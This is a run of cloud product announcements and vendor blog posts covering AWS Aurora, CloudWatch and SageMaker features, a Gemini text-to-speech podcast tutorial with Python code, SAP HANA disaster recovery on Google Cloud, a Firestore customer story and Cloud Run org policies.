Amazon Aurora PostgreSQL is now available as a quick create vector store in Amazon Bedrock Knowledge Bases. With the new Aurora quick create option, developers and data scientists building generative AI applications can select Aurora PostgreSQL as their vector store with one click to deploy an Aurora Serverless cluster preconfigured with pgvector in minutes. Aurora Serverless is an on-demand, autoscaling configuration where capacity is adjusted automatically based on application demand, making it ideal as a developer vector store.
Knowledge Bases securely connects foundation models (FMs) running in Bedrock to your company data sources for Retrieval Augmented Generation (RAG) to deliver more relevant, context-specific, and accurate responses that make your FM more knowledgeable about your business. To implement RAG, organizations must convert data into embeddings (vectors) and store these embeddings in a vector store for similarity search in generative artificial intelligence (AI) applications. Aurora PostgreSQL, with the pgvector extension, has been supported as a vector store in Knowledge Bases for existing Aurora databases. With the new quick create integration with Knowledge Bases, Aurora is now easier to set up as a vector store for use with Bedrock.
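For context, once Knowledge Bases has populated the Aurora cluster, retrieving the nearest document chunks for a query embedding is a standard pgvector similarity search. The sketch below is illustrative only; the table name, column names, and connection details are placeholders rather than the schema Bedrock provisions.

import psycopg2  # any PostgreSQL driver works; pgvector queries are plain SQL

# Placeholder connection details; use your Aurora cluster endpoint and credentials.
conn = psycopg2.connect(
    host="your-aurora-cluster.cluster-xxxx.us-east-1.rds.amazonaws.com",
    dbname="postgres",
    user="bedrock_user",
    password="...",
)

# Hypothetical table: documents(id, chunk_text, embedding vector(1024)).
# The query embedding should come from the same embedding model used at ingestion time.
query_embedding = "[0.12, -0.03, 0.87]"

with conn.cursor() as cur:
    # "<=>" is pgvector's cosine-distance operator; a smaller distance means more similar.
    cur.execute(
        "SELECT id, chunk_text FROM documents ORDER BY embedding <=> %s::vector LIMIT 5;",
        (query_embedding,),
    )
    for doc_id, chunk_text in cur.fetchall():
        print(doc_id, chunk_text[:80])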
The quick create option in Bedrock Knowledge Bases is available in these regions, with the exception of AWS GovCloud (US-West), which is planned for Q4 2024. To learn more about RAG with Amazon Bedrock and Aurora, see Amazon Bedrock Knowledge Bases.
Amazon Aurora combines the performance and availability of high-end commercial databases with the simplicity and cost-effectiveness of open-source databases. To get started using Amazon Aurora PostgreSQL as a vector store for Amazon Bedrock Knowledge Bases, take a look at our documentation.
Amazon CloudWatch now offers centralized visibility into critical AWS service telemetry configurations, such as Amazon VPC Flow Logs, Amazon EC2 Detailed Metrics, and AWS Lambda Traces. This enhanced visibility enables central DevOps teams, system administrators, and service teams to identify potential gaps in their infrastructure monitoring setup. The telemetry configuration auditing experience seamlessly integrates with AWS Config to discover AWS resources, and can be turned on for the entire organization using the new AWS Organizations integration with Amazon CloudWatch.
With visibility into telemetry configurations, you can identify monitoring gaps that might have been missed in your current setup. For example, this helps you identify gaps in your EC2 detailed metrics so that you can address them and easily detect short-lived performance spikes and build responsive auto-scaling policies. You can audit telemetry configuration coverage at both resource type and individual resource levels, refining the view by filtering across specific accounts, resource types, or resource tags to focus on critical resources.
The telemetry configurations auditing experience is available in US East (N. Virginia), US West (Oregon), US East (Ohio), Asia Pacific (Tokyo), Asia Pacific (Singapore), Asia Pacific (Sydney), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm) regions. There is no additional cost to turn on the new experience, including for AWS Config.
You can get started with auditing your telemetry configurations using the Amazon CloudWatch Console, by clicking on Telemetry config in the navigation panel, or programmatically using the API/CLI. To learn more, visit our documentation.
AWS Config added support for a service-linked recorder, a new type of AWS Config recorder that is managed by an AWS service and can record configuration data on service-specific resources, such as the new Amazon CloudWatch telemetry configurations audit. By enabling the service-linked recorder in Amazon CloudWatch, you gain centralized visibility into critical AWS service telemetry configurations, such as Amazon VPC Flow Logs, Amazon EC2 Detailed Metrics, and AWS Lambda Traces.
With service-linked recorders, an AWS service can deploy and manage an AWS Config recorder on your behalf to discover resources and utilize the configuration data to provide differentiated features. For example, an Amazon CloudWatch managed service-linked recorder helps you identify monitoring gaps across critical resources within your organization, providing a centralized, single-pane view of telemetry configuration status. Service-linked recorders are immutable to ensure consistency, prevent configuration drift, and simplify the experience. Service-linked recorders operate independently of any existing AWS Config recorder, if one is enabled. This allows you to independently manage your AWS Config recorder for your specific use cases while authorized AWS services manage the service-linked recorder for feature-specific requirements.
Amazon CloudWatch managed service-linked recorder is now available in US East (N. Virginia), US West (Oregon), US East (Ohio), Asia Pacific (Tokyo), Asia Pacific (Singapore), Asia Pacific (Sydney), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm) regions. The AWS Config service-linked recorder specific to the Amazon CloudWatch telemetry configuration feature is available to customers at no additional cost.
This on-demand analysis experience for Amazon RDS Performance Insights, which was previously available in only 15 regions, is now available in all commercial regions. The feature allows you to analyze Performance Insights data for a time period of your choice. You can learn how the selected time period differs from normal, what went wrong, and get advice on corrective actions. Through simple-to-understand graphs and explanations, you can identify the chief contributors to performance issues, and you get guidance on the next steps to act on them. This can reduce the mean time to diagnosis for database performance issues from hours to minutes.
Amazon RDS Performance Insights is a database performance tuning and monitoring feature of RDS that allows you to visually assess the load on your database and determine when and where to take action. With one click in the Amazon RDS Management Console, you can add a fully-managed performance monitoring solution to your Amazon RDS database.
We are excited to announce two new capabilities in SageMaker Inference that significantly enhance the deployment and scaling of generative AI models: Container Caching and Fast Model Loader. These innovations address critical challenges in scaling large language models (LLMs) efficiently, enabling faster response times to traffic spikes and more cost-effective scaling. By reducing model loading times and accelerating autoscaling, these features allow customers to improve the responsiveness of their generative AI applications as demand fluctuates, particularly benefiting services with dynamic traffic patterns.
Container Caching dramatically reduces the time required to scale generative AI models for inference by pre-caching container images. This eliminates the need to download them when scaling up, resulting in significant reduction in scaling time for generative AI model endpoints. Fast Model Loader streams model weights directly from Amazon S3 to the accelerator, loading models much faster compared to traditional methods. These capabilities allow customers to create more responsive auto-scaling policies, enabling SageMaker to add new instances or model copies quickly when defined thresholds are reached, thus maintaining optimal performance during traffic spikes while at the same time managing costs effectively.
These new capabilities are available in all AWS Regions where Amazon SageMaker Inference is available. To learn more, see our documentation for detailed implementation guidance.
Today, we are introducing the new ModelTrainer class and enhancing the ModelBuilder class in the SageMaker Python SDK. These updates streamline training workflows and simplify inference deployments.
The ModelTrainer class enables customers to easily set up and customize distributed training strategies on Amazon SageMaker. This new feature accelerates model training times, optimizes resource utilization, and reduces costs through efficient parallel processing. Customers can smoothly transition their custom entry points and containers from a local environment to SageMaker, eliminating the need to manage infrastructure. ModelTrainer simplifies configuration by reducing parameters to just a few core variables and providing user-friendly classes for intuitive SageMaker service interactions. Additionally, with the enhanced ModelBuilder class, customers can now easily deploy Hugging Face models, switch between developing in a local environment and on SageMaker, and customize inference using their own pre- and post-processing scripts. Importantly, customers can now pass trained model artifacts from the ModelTrainer class directly to the ModelBuilder class, enabling a seamless transition from training to inference on SageMaker.
You can learn more about the ModelTrainer class here and the ModelBuilder enhancements here, and get started with the ModelTrainer and ModelBuilder sample notebooks.
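As a rough illustration of the reduced configuration surface, a training job set up with the new class might look like the sketch below. The module paths, class names, and parameters shown are assumptions based on this announcement rather than a verified API reference, so consult the SageMaker Python SDK documentation for the exact interface.

# Sketch only: import paths and parameter names are assumptions, not verified SDK signatures.
from sagemaker.modules.train import ModelTrainer
from sagemaker.modules.configs import SourceCode

# Point the trainer at a local training script and a container image;
# SageMaker provisions and manages the underlying infrastructure.
source_code = SourceCode(
    source_dir="./training_code",   # local directory with the custom entry point
    entry_script="train.py",        # same script used during local development
    requirements="requirements.txt",
)

trainer = ModelTrainer(
    training_image="<your-training-container-uri>",
    source_code=source_code,
)

trainer.train()  # launches the managed training job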
Generative AI is giving people new ways to experience audio content, from podcasts to audio summaries. For example, users are embracing NotebookLM’s recent Audio Overview feature, which turns documents into audio conversations. With one click, two AI hosts start up a lively “deep dive” discussion based on the sources you provide. They summarize your material, make connections between topics, and discuss back and forth.
While NotebookLM offers incredible benefits for making sense of complex information, some users want more control over generating unique audio experiences – for example, creating their own podcasts. Podcasts are an increasingly popular medium for creators, business leaders, and users to listen to what interests them. Today, we’ll share how Gemini 1.5 Pro and the Text-to-Speech API on Google Cloud can help you create conversations with diverse voices and generate podcast scripts with custom prompts.
The approach: Expand your reach with diverse audio formats
A great podcast starts with accessible audio content. Gemini's multimodal capabilities, combined with our high-fidelity Text-to-Speech API, offer 380+ voices across 50+ languages and custom voice creation. This unlocks new ways for users to experience content and expand their reach through diverse audio formats.
This approach also helps content creators reach a wider audience and streamline the content creation process, including:
Expanded reach: Connect with an audience segment that prefers audio content.
Increased engagement: Foster deeper connections with listeners through personalized audio.
Content repurposing: Maximize the value of existing written content by transforming it into a new format, reaching a wider audience without starting from scratch.
Let’s take a look at how.
The architecture: Gemini 1.5 Pro and Text-to-Speech
Our audio overview creation architecture uses two powerful services from Google Cloud:
Gemini 1.5 Pro: This advanced generative AI model excels at understanding and generating human-like text. We’ll use Gemini 1.5 Pro to:
Generate engaging scripts: Feed your podcast content overview to Gemini 1.5 Pro, and it can generate compelling conversational scripts, complete with introductions, transitions, and calls to action.
Adapt content for audio: Gemini 1.5 Pro can optimize written content for the audio format, ensuring a natural flow and engaging listening experience. It can also adjust the tone and style to suit any format such as podcasts.
Text-to-Speech API: This API converts text into natural-sounding speech, giving a voice to your scripts. You can choose from various voices and languages to match your brand and target audience.
How to create an engaging podcast yourself, step-by-step
Content preparation: Prepare your source content, such as a blog post. Ensure it’s well-structured and edited for clarity. Consider dividing longer posts into multiple episodes for optimal listening duration.
Gemini 1.5 Pro integration: Use Gemini 1.5 Pro to generate a conversational script from your source content. Experiment with prompts to fine-tune the output, achieving the desired style and tone. Example prompt: “Generate an engaging audio overview script from this podcast, including an introduction, transitions, and a call to action. Target audience is technical developers, engineers, and cloud architects.”
Section extraction: For complex or lengthy source documents, you might use Gemini 1.5 Pro to extract key sections and subsections as JSON, enabling a more structured approach to script generation.
A Python function that powers our podcast creation process can look as simple as the following:
import vertexai
from vertexai.generative_models import GenerativeModel, Part

# generation_config and safety_settings are assumed to be defined elsewhere in the notebook.

def extract_sections_and_subsections(document1: Part, project="<your-project-id>", location="us-central1") -> str:
    """
    Extracts hierarchical sections and subsections from a Google Cloud blog post
    provided as a PDF document.

    This function uses the Gemini 1.5 Pro language model to analyze the structure
    of a blog post and identify its key sections and subsections. The extracted
    information is returned in JSON format for easy parsing and use in
    various applications.

    This is particularly useful for:

    * Large documents: Breaking down content into manageable chunks for
      efficient processing and analysis.
    * Podcast creation: Generating multi-episode series where each episode
      focuses on a specific section of the blog post.

    Args:
        document1 (Part): A Part object representing the PDF document,
            typically obtained using `Part.from_uri()`. For example:
            document1 = Part.from_uri(
                mime_type="application/pdf",
                uri="gs://your-bucket/your-pdf.pdf"
            )
        project: The ID of your Google Cloud project. Defaults to "<your-project-id>".
        location: The region of your Google Cloud project. Defaults to "us-central1".

    Returns:
        str: A JSON string representing the extracted sections and subsections.
            Returns an empty string if there are issues with processing or
            the model output.
    """
    vertexai.init(project=project, location=location)  # Initialize Vertex AI
    model = GenerativeModel("gemini-1.5-pro-002")

    prompt = """Analyze the following blog post and extract its sections and subsections. Represent this information in JSON format using the following structure:
    [
      {
        "section": "Section Title",
        "subsections": [
          "Subsection 1",
          "Subsection 2",
          // ...
        ]
      },
      // ... more sections
    ]"""

    try:
        responses = model.generate_content(
            ["""The pdf file contains a Google Cloud blog post required for podcast-style analysis:""", document1, prompt],
            generation_config=generation_config,
            safety_settings=safety_settings,
            stream=True,  # Stream results for better performance with large documents
        )

        response_text = ""
        for response in responses:
            response_text += response.text

        return response_text

    except Exception as e:
        print(f"Error during section extraction: {e}")
        return ""
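A hypothetical invocation of this function, with a placeholder bucket and PDF path, could look like this:

# Hypothetical usage; the bucket name and PDF path are placeholders.
document1 = Part.from_uri(
    mime_type="application/pdf",
    uri="gs://your-bucket/your-blog-post.pdf",
)

sections_json = extract_sections_and_subsections(
    document1, project="<your-project-id>", location="us-central1"
)
print(sections_json)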
Then, use Gemini 1.5 Pro to generate the podcast script for each section. Again, provide clear instructions in your prompts, specifying target audience, desired tone, and approximate episode length.
For each section and subsection, you can use a function like the one below to generate a script:
def generate_podcast_content(section, subsection, document1: Part, targetaudience, guestname, hostname, project="<your-project-id>", location="us-central1") -> str:
    """Generates a podcast dialogue in JSON format from a blog post subsection.

    This function uses the Gemini model in Vertex AI to create a conversation
    between a host and a guest, covering the specified subsection content. It uses
    a provided PDF as source material and outputs the dialogue in JSON.

    Args:
        section: The blog post's main section (e.g., "Introduction").
        subsection: The specific subsection (e.g., "Benefits of Gemini 1.5").
        document1: A `Part` object representing the source PDF (created using
            `Part.from_uri(mime_type="application/pdf", uri="gs://your-bucket/your-pdf.pdf")`).
        targetaudience: The intended audience for the podcast.
        guestname: The name of the podcast guest.
        hostname: The name of the podcast host.
        project: Your Google Cloud project ID.
        location: Your Google Cloud project location.

    Returns:
        A JSON string representing the generated podcast dialogue.
    """
    print(f"Processing section: {section} and subsection: {subsection}")

    prompt = f"""Create a podcast dialogue in JSON format based on a provided subsection of a Google Cloud blog post (found in the attached PDF).
    The dialogue should be a lively back-and-forth between a host (R) and a guest (S), presented as a series of turns.
    The host should guide the conversation by asking questions, while the guest provides informative and accessible answers.
    The script must fully cover all points within the given subsection.
    Use clear explanations and relatable analogies.
    Maintain a consistently positive and enthusiastic tone (e.g., "Movies, I love them. They're like time machines...").
    Include only one introductory host greeting (e.g., "Welcome to our next episode..."). No music, sound effects, or production directions.

    JSON structure:
    {{
      "multiSpeakerMarkup": {{
        "turns": [
          {{"text": "Podcast script content here...", "speaker": "R"}},  // R for host, S for guest
          // ... more turns
        ]
      }}
    }}

    Input Data:
    Section: "{section}"
    Subsections to cover in the podcast: "{subsection}"
    Target Audience: "{targetaudience}"
    Guest name: "{guestname}"
    Host name: "{hostname}"
    """

    vertexai.init(project=project, location=location)
    model = GenerativeModel("gemini-1.5-pro-002")

    responses = model.generate_content(
        ["""The pdf file contains a Google Cloud blog post required for podcast-style analysis:""", document1, prompt],
        generation_config=generation_config,  # Assuming these are defined already
        safety_settings=safety_settings,      # Assuming these are defined already
        stream=True,
    )

    response_text = ""
    for response in responses:
        response_text += response.text

    return response_text
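Tying the two functions together, a small (hypothetical) driver loop can walk the extracted sections and generate a script per subsection; note that the model's JSON output may need light cleanup before parsing:

# Hypothetical glue code: the names and prompt values are placeholders.
import json

sections = json.loads(sections_json)  # output of extract_sections_and_subsections()

episode_scripts = []
for entry in sections:
    for subsection in entry["subsections"]:
        script_json = generate_podcast_content(
            section=entry["section"],
            subsection=subsection,
            document1=document1,
            targetaudience="technical developers, engineers, and cloud architects",
            guestname="Alex",
            hostname="Sam",
        )
        # The model returns a JSON string; strip any stray formatting before parsing.
        episode_scripts.append(json.loads(script_json.strip()))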
Next, feed the script generated by Gemini to the Text-to-Speech API. Choose a voice and language appropriate for your target audience and content.
A function like the one below can generate human-quality audio from text. For this, we can use the advanced Text-to-Speech API in Google Cloud.
from googleapiclient.discovery import build

def generate_audio_from_text(input_json):
    """Generates audio using the Google Text-to-Speech API.

    Args:
        input_json: A dictionary containing the 'multiSpeakerMarkup' for the TTS API.
            This is generated by the Gemini 1.5 Pro model in generate_podcast_content().

    Returns:
        The audio data (base64-encoded MP3) if successful, None otherwise.
    """
    try:
        # Build the Text-to-Speech service
        service = build('texttospeech', 'v1beta1')

        # Prepare synthesis input
        synthesis_input = {
            'multiSpeakerMarkup': input_json['multiSpeakerMarkup']
        }

        # Configure voice and audio settings
        voice = {
            'languageCode': 'en-US',
            'name': 'en-US-Studio-MultiSpeaker'
        }

        audio_config = {
            'audioEncoding': 'MP3',
            'pitch': 0,
            'speakingRate': 0,
            'effectsProfileId': ['small-bluetooth-speaker-class-device']
        }

        # Make the API request
        response = service.text().synthesize(
            body={
                'input': synthesis_input,
                'voice': voice,
                'audioConfig': audio_config
            }
        ).execute()

        # Extract and return the audio content
        audio_content = response['audioContent']
        return audio_content

    except Exception as e:
        print(f"Error: {e}")
        return None
Finally, to store audio content already encoded as base64 MP3 data in Google Cloud Storage, you can use the google-cloud-storage Python library. This allows you to decode the base64 string and upload the resulting bytes directly to a designated bucket, specifying the content type as ‘audio/mp3’.
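A minimal sketch of that upload, assuming a bucket and object name of your choosing:

import base64
from google.cloud import storage

def upload_podcast_audio(audio_content_b64: str, bucket_name: str, blob_name: str) -> str:
    """Decodes base64 MP3 audio (as returned by the Text-to-Speech API) and uploads it to Cloud Storage."""
    audio_bytes = base64.b64decode(audio_content_b64)

    client = storage.Client()
    bucket = client.bucket(bucket_name)
    blob = bucket.blob(blob_name)
    blob.upload_from_string(audio_bytes, content_type="audio/mp3")

    return f"gs://{bucket_name}/{blob_name}"

# Hypothetical usage: the bucket and object names are placeholders.
# uri = upload_podcast_audio(audio_content, "your-podcast-bucket", "episodes/episode-1.mp3")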
Hear it for yourself
While the Text-to-Speech API produces high-quality audio, you can further enhance your audio conversation with background music, sound effects, and professional editing tools. Hear it for yourself – download the audio conversation I created from this blog using Gemini 1.5 Pro and the Text-to-Speech API.
To start creating for yourself, explore our full suite of audio generation features in Google Cloud services, such as the Text-to-Speech API and Gemini models, using the free tier. We recommend experimenting with different modalities like text and image prompts to experience Gemini’s potential for content creation.
For many businesses, the SAP HANA database is the heart of their SAP business applications: a repository of mission-critical data that drives operations. But what happens when disaster strikes?
Protecting a SAP HANA system involves choices. Common methods include HANA System Replication (HSR) for high availability and Backint for backups. But while having a disaster recovery (DR) strategy is crucial, it doesn’t need to be overly complex or expensive. While HSR offers rapid recovery, it requires a significant investment. For many SAP deployments, a cold DR strategy strikes the perfect balance between cost-effectiveness and recovery time objectives (RTOs).
What is cold DR? Think of it as your backup plan’s backup plan. It minimizes costs by maintaining a non-running environment that’s only activated when disaster strikes. This traditionally means longer RTOs than hot or warm DR, but significantly lower costs. That trade-off is often deemed sufficient, yet businesses are always looking for better RTOs at lower cost.
Backint, when paired with storage (e.g., Persistent Disk and Cloud Storage), enables data transfer to a secondary location and can be an effective cold DR solution. However, using Backint for DR can mean longer restore times and high storage costs, especially for large databases. Google Cloud is delivering a solution that addresses both the cost-effectiveness of cold DR and the rapid recovery of a full DR solution: Backup and DR Service with Persistent Disk (PD) snapshot integration. This innovative approach leverages the power of incremental forever backups and HANA Savepoints to protect your SAP HANA environment.
Rethinking SAP disaster recovery in Google Cloud
Backup and DR is an enterprise backup and recovery solution that integrates directly with cloud-based workloads that run in Google Compute Engine. Backup and DR provides backup and recovery capabilities for virtual machines (VMs), file systems, multiple SAP databases (HANA, ASE, MaxDB, IQ) as well as Oracle, Microsoft SQL Server, and Db2. You can elect to create backup plans to configure the time of backup, how long to retain backups, where to store the backups (regional/multi-regional) and in what tier of storage, along with specifying database log backup intervals to help ensure a low recovery point objective (RPO).
A recent Backup and DR feature offers Persistent Disk (PD) snapshot integration for SAP HANA databases. This is a significant advancement because these PD snapshots are integrated with SAP HANA Savepoints to help ensure database consistency. When the database is scheduled to be backed up, the Backup and DR agent running in the SAP HANA node instructs the database to trigger a Savepoint image, where all changed data is written to storage in the form of pages. Another benefit of this integration is that the data copy process occurs on the storage side. You no longer copy the backup data through the same network interfaces that the database or operating system are using. This results in production workloads retaining their compute and networking resources, even during an active backup.
Once completed, Backup and DR services trigger the PD snapshots from the Google Cloud storage APIs, so that the image is captured on disk, and logs can also be truncated if desired. All of these snapshots are “incremental forever” and database-consistent backups. Alternatively, you can use logs to recover to a point in time (from the HANA PD snapshot image).
Integration with SAP HANA Savepoints is critical to this process. Savepoints are SAP HANA API calls whose primary use is to help speed up recovery restart times, to provide a low RTO. They achieve this because when the system is starting up, logs don’t need to be processed from the beginning, but only from the last Savepoint position. Savepoints are coordinated across all processes (called SAP HANA services) and instances of the database to ensure transaction consistency.
The HANA Savepoint Backup sequence using PD snapshots can be summarized as:
Tell agent to initiate HANA Savepoint
Initiate PD snapshot, wait for ‘Uploading’ state (seconds)
Tell agent to close HANA Savepoint
Wait for PD snapshot ‘Ready’ state (minutes)
Expire any logs on disk that have passed expiration time
Catalog backup for reporting, auditing
In addition, you can configure log backups to occur regularly, independent of Savepoint snapshots. These logs are stored on a separate disk and also backed up via PD snapshots, allowing for point-in-time recovery.
Operating system backups
What about the operating system backups? Good news: Backup and DR lets you take PD snapshots for the bootable OS and selectively any other disk attached directly to your Compute Engine VMs. These backup images can be also stored in the same regional or multi-regional location for cold DR purposes.
You can then restore HANA databases to a local VM or your disaster recovery (DR) region. This flexibility allows you to use your DR region for a variety of purposes, such as development and testing, or maintaining a true cold DR region for cost efficiency.
Backup and DR helps simplify DR setup by allowing you to pre-configure networks, firewall rules, and other dependencies. It can then quickly provision a backup appliance in your DR region and restore your entire environment, including VMs, databases, and logs.
This approach gives you the freedom to choose the best DR strategy for your needs: hot, warm, or cold, each with its own cost, RPO, and RTO implications.
One of the key advantages of using Backup and DR with PD snapshots is the significant cost savings it offers compared to traditional DR methods. By eliminating the need for full backups and leveraging incremental forever snapshots, customers can reduce their storage costs by up to 50%, in our testing. Additionally, we found that using a cold DR region with Backup and DR can reduce storage consumption by 30% or more compared to using a traditional backup to file methodology.
Why this matters
Using Google Cloud’s Backup and DR to protect your SAP HANA environment brings a lot of benefits:
Better backup performance (throughput) – the storage layer handles data transfer rather than an agent on the HANA server
Reduced TCO through elimination of regular full backups
Reduced I/O on the SAP HANA server by avoiding the database reads and writes during the backup window, which can be very long with a regular Backint full backup event
Operational simplicity with an onboarding wizard, and no need to manage additional storage provisioning on the source host
Faster recovery times (local or DR) as PD Snapshots recover natively to the VM storage subsystem (not copied over customer networks). Recovery to a point-in-time is possible with logs from the HANA PD Snapshot. You can even take more frequent Savepoints by scheduling these every few hours, to further reduce the log recovery time for restores
Data resiliency – HANA PD Snapshots are stored in regional or multi-regional locations
Low Cost DR – Since backup images for VMs and databases are already replicated to your DR region (via regional or multi-regional PD snapshots), recovery is just a matter of bringing up your VM, choosing your recovery point in time for the SAP HANA database, and waiting for a short period of time
When to choose Persistent Disk Asynchronous Replication
While Backup and DR offers a comprehensive solution for many, some customers may have specific needs or preferences that require a different approach. For example, if your SAP application lacks built-in replication, or you need to replicate your data at the disk level, Persistent Disk Asynchronous Replication is a valuable alternative. This approach allows you to spin up new VMs in your DR region using replicated disks, speeding up the recovery process.
PD Async’s infrastructure-level replication is application agnostic, making it ideal for applications without built-in replication. It’s also cost-effective, as you only pay for the storage used by the replicated data. Plus, it offers flexibility, allowing you to customize the replication frequency to balance cost and RPOs.
If you are interested in setting up PD Async and would like to configure it with Terraform, take a look at the Terraform example one of our colleagues created, which shows how to test a failover and failback scenario for a number of Compute Engine VMs.
Take control of your SAP disaster recovery
By leveraging Google Cloud’s Backup and DR and PD Async, you can build a robust and cost-effective cold DR solution for your SAP deployments on Google Cloud that minimizes costs without compromising on data protection, providing peace of mind in the face of unexpected disruptions.
HighLevel is an all-in-one sales and marketing platform built for agencies. We empower businesses to streamline their operations with tools like CRM, marketing automation, appointment scheduling, funnel building, membership management, and more. But what truly sets HighLevel apart is our commitment to AI-powered solutions, helping our customers automate their businesses and achieve remarkable results.
As a software as a service (SaaS) platform experiencing rapid growth, we faced a critical challenge: managing a database that could handle volatile write loads. Our business often sees database writes surge from a few hundred requests per second (RPS) to several thousand within minutes. These sudden spikes caused performance issues with our previous cloud-based document database.
This previous solution required us to provision dedicated resources, which created several bottlenecks:
Slow release cycles: Provisioning resources before every release impacted our agility and time-to-market.
Scaling limitations: We constantly battled DiskOps limitations due to high write throughput and numerous indexes. This forced us to shard larger collections across clusters, requiring complex coordination and consuming valuable engineering time.
Going serverless with Firestore
To overcome these challenges, we sought a database solution that could seamlessly scale and handle our demanding write requirements.
Firestore's serverless architecture made it a strong contender from the start. But it was the arrival of point-in-time recovery and scheduled backups that truly solidified our decision. These features eliminated our initial concerns and gave us the confidence to migrate the majority of HighLevel’s workloads to Firestore.
Since migrating to Firestore, we have seen significant benefits, including:
Increased developer productivity: Firestore’s simplicity has boosted our developer productivity by 55%, allowing us to focus on product innovation.
Enhanced scalability: We’ve scaled to over 30 billion documents without any manual intervention, handling workloads with spikes of up to 250,000 RPS and five million real-time queries.
Improved reliability: Firestore has proven exceptionally reliable, ensuring consistent performance even under peak load.
Real-time capabilities: Firestore’s real-time sync capabilities power our real-time dashboards without the need for complex socket infrastructure.
Firestore powering HighLevel’s AI
Firestore also plays a crucial role in enabling our AI-powered services across Conversation AI, Content AI, Voice AI and more. All these services are designed to put our customers’ businesses on autopilot.
For Conversation AI, for example, we use a retrieval augmented generation (RAG) architecture. This involves crawling and indexing customer data sources, generating embeddings, and storing them in Firestore, which acts as our vector database (a minimal query sketch follows the list below). This approach allows us to:
Overcome context window limitations of generative AI models
Reduce latency and cost
Improve response accuracy and minimize hallucinations
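As a rough sketch of what querying Firestore as a vector store can look like with the Python client's K-nearest-neighbor search, consider the snippet below; the collection name, field names, and embedding helper are illustrative placeholders, not HighLevel's actual schema.

# Illustrative sketch; collection, field names, and the embedding helper are placeholders.
from google.cloud import firestore
from google.cloud.firestore_v1.vector import Vector
from google.cloud.firestore_v1.base_vector_query import DistanceMeasure

db = firestore.Client()

# Embed the user's question with the same model used when indexing the documents.
query_embedding = embed_text("How do I reschedule an appointment?")  # placeholder helper

results = (
    db.collection("knowledge_chunks")
    .find_nearest(
        vector_field="embedding",
        query_vector=Vector(query_embedding),
        distance_measure=DistanceMeasure.COSINE,
        limit=5,
    )
    .get()
)

for doc in results:
    print(doc.id, doc.to_dict().get("text", "")[:80])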
Lessons learned and a path forward
Our journey with Firestore has been eye-opening, and we’ve learned valuable lessons along the way.
For example, in December 2023, we encountered intermittent failures in collections with high write queries per second (QPS). These collections were experiencing write latencies of up to 60 seconds, causing operations to fail as deadlines expired before completion. With support from the Firestore team, we conducted a root-cause analysis and discovered that the issue stemmed from default single-field indexes on constantly increasing fields. These indexes, while helpful for single-field queries, were generating excessive writes on a specific sector of the index.
Once we understood the root cause, our team identified and excluded these unused indexes. This optimization resulted in a dramatic improvement, reducing write-tail latency from 60 seconds to just 15 seconds.
Firestore has been instrumental in our ability to scale rapidly, enhance developer productivity, and deliver innovative AI-powered solutions. We are confident that Firestore will continue to be a cornerstone of our technology stack as we continue to grow and evolve. Moving forward, we are excited to continue leveraging Firestore and Google Cloud to power our AI initiatives and deliver exceptional value to our customers.
Get started
Are you curious to learn more about how to use Firestore in your organization?
Watch our Next 2024 breakout session to discover recent Firestore updates, learn more about how HighLevel is experiencing significant total cost of ownership savings, and more!
This project has been a team effort. Shout out to the Platform Data team — Pragnesh Bhavsar in particular who has done an amazing job leading the team to ensure our data infrastructure runs at such a massive scale without hiccups. We also want to thank Varun Vairavan and Kiran Raparti for their key insights and guidance. For more from Karan Agarwal, follow him on LinkedIn.
Financial institutions typically process many millions of transactions daily, so when they run on cloud technology, any security lapse in their cloud infrastructure can have catastrophic consequences. For serverless compute workloads, Cloud Run on Google Cloud is commonly employed. That’s why we are happy to announce the general availability of Google Cloud’s custom org policies to fortify Cloud Run environments and align them with everything from baseline requirements to the most stringent regulatory standards.
Financial service institutions operate under stringent global and local regulatory frameworks and bodies, such as regulations from the EU’s European Banking Authority, US Securities and Exchange Commission, or the Monetary Authority of Singapore. Also, the sensitive nature of financial data necessitates robust security measures. Hence, maintaining a comprehensive security posture is of major importance, encompassing both coarse-grained and fine-grained controls to address internal and external threats.
Tailored Security, Configurable to Customer’s Needs
Network Access: Reduce unauthorized access attempts by precisely defining VPC configurations and ingress settings.
Deployment Security: Mandatory binary authorization is able to prevent potentially harmful deployments.
Resource Efficiency: Constraints on memory and CPU usage ensure getting the most out of cloud resources.
Stability & Consistency: Limiting the use of Cloud Run features to those in general availability (GA) and enforcing standardized naming conventions enables a predictable, manageable environment.
This level of customization enables building a Cloud Run environment that’s not just secure, but also perfectly aligned with unique operational requirements.
Addressing the Complexities of Commerzbank’s Cloud Run Setup
Within Commerzbank’s Big Data & Advanced Analytics division, the company leverages cloud technology for its inherent benefits, particularly serverless services. Cloud Run is a crucial component of our serverless architecture and stretches across many applications due to its flexibility. While Cloud Run already offered security features such as VPC Service Controls, multi-regionality, and CMEK support, granular control over all Cloud Run’s capabilities was initially limited.
Diagram illustrating simplified policy management with Custom Org Policies
Better Together
The introduction of Custom Org Policies for Cloud Run now allows Commerzbank to directly map its rigorous security controls, ensuring compliant use of the service. This enhanced control enables the full-scale adoption and scalability of Cloud Run to support our business needs.
The granular control made possible by Custom Org Policies has been a game-changer. Commerzbank and customers like it can now tailor their security policies to their exact needs, preventing potential breaches and ensuring regulatory compliance.
A Secure Foundation for Innovation
Custom Org Policies have become an indispensable part of the cloud security toolkit. Their ability to enforce granular, tailored controls has boosted Commerzbank’s Cloud Run security and compliance. This newfound confidence allows them to innovate with agility, knowing their cloud infrastructure is locked down.
If you’re looking to enhance your Cloud Run security and compliance, we highly recommend exploring Custom Org Policies. They’ve been instrumental in Commerzbank’s journey, and we’re confident they can benefit your organization, too.
Looking Ahead: We’re also eager to explore how to leverage custom org policies for other Google Cloud services as Commerzbank continues to expand its cloud footprint. The bank’s commitment to security and compliance is unwavering, and custom org policies will remain a cornerstone of Commerzbank’s strategy.
We’re excited to share that Gartner has recognized Google as a Leader in the 2024 Gartner® Magic Quadrant™ for Data Integration Tools. As a Leader in this report, we believe Google’s position is a testament to delivering continuous customer innovation in areas such as unified data to AI governance, flexible and accessible data engineering experiences, and AI-powered data integration capabilities.
Today, most organizations operate with just 10% of the data they generate, which is often trapped in silos and disconnected legacy systems. The rise of AI unlocks the potential of the remaining 90%, enabling you to unify this data — regardless of format — within a single platform.
This convergence is driving a profound shift in how data teams approach data integration. Traditionally, data integration was seen as a separate IT process solely for enterprise business intelligence. But with the increased adoption of the cloud, we’re witnessing a move away from legacy on-premises technologies and towards a more unified approach that enables various users to access and work with a more robust set of data sources.
